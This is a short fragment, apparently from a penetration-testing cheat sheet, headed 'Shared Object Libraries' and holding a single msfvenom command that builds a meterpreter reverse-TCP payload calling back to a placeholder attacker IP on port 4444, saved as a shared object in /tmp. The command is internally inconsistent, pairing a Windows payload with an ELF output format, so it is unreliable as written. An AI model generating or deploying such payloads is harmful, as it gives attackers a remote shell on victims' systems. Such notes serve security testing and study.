🟢Shared Object Libraries

$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f elf -o /tmp/my_payload.so

Last updated